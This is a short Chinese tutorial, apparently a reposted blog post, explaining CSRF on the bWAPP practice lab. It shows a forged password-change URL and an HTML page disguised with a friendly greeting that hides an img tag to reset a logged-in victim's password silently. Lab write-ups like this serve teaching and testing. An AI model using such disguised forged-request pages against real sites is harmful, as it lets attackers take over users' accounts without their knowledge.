如何解析CSRF漏洞
这篇文章给大家介绍如何解析CSRF漏洞,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
CSRF:跨站请求伪造,伪装成用户身份来执行一些非用户自愿的恶意以及非法操作
CSRF和XSS区别:
1、CSRF需要登陆后操作,XSS不需要
2、CSRF通过伪装成受信任用户请求受信任的网站
一、环境:BWAPP
二、登陆,默认账号为:bee,密码为:bug
三、选择从在csrf的页面,将密码修改为1111,change
四、分析url
http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change
五、退出账号,重新登陆一下,密码已经修改为1111
六、重修修改一下url,直接访问这个这个地址,
http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change
密码被重置为2222
七、隐蔽利用
1、新建一个html页面,将url地址重新修改一下,添加到img标签下的src属性,
<!DOCTYPE html> <html> <head> <title>哎呦不错哦。。。</title> </head> <body> <h3>好久不见<h3> <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change"> </body> </html>
2、访问这个html,自动访问修改后的url,密码也自动修改了
关于如何解析CSRF漏洞就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:niceseo99@gmail.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。
评论